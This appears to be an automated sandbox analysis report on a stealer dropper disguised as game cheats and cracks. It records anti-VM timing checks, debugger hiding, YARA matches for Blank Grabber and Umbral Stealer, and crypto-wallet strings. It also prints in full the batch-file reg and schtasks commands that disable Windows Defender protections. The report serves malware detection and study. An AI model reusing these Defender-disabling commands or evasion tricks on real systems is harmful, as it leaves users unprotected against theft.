                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F8F9CE7A99Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F8F9DA92C7Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                            Tries to evade analysis by execution special instruction (VM detection)
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 1BC027A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 1BC1C300000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1816Thread sleep count: 163 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 6600Thread sleep count: 115 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 7072Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: vboxtray
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vboxservice
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: qemu-ga
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwareuser
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: vmusrvc
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwareservice+discordtokenprotector
                            Source: Lunch LaCheatV2.exe, 00000006.00000002.2266173953.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\-
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmsrvc
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmtoolsd
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwaretray
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                            Source: 52cheatand52rat.exe, 00000002.00000002.2202108160.000001BC0264E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Hides threads from debuggers
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: KernelDebuggerInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Disables Windows Defender (deletes autostart)
                            Source: C:\Windows\SysWOW64\reg.exeRegistry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpywareJump to behavior
                            Source: C:\Windows\SysWOW64\reg.exeRegistry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Disable Windows Defender real time protection (registry)
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1Jump to behavior
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiVirus 1Jump to behavior
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpuserRegistry value created: MpEnablePus 0Jump to behavior
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1Jump to behavior
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiVirus 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpuserRegistry value created: MpEnablePus 0
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ReportingRegistry value created: DisableEnhancedNotifications 1
                            Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNetRegistry value created: DisableBlockAtFirstSeen 1

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: wKj1CBkbos.exe, type: SAMPLE
                            Source: Yara matchFile source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: wKj1CBkbos.exe, type: SAMPLE
                            Source: Yara matchFile source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                            Source: Yara matchFile source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: wKj1CBkbos.exe, type: SAMPLE
                            Source: Yara matchFile source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: wKj1CBkbos.exe, type: SAMPLE
                            Source: Yara matchFile source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED

                            Mitre Att&ck Matrix

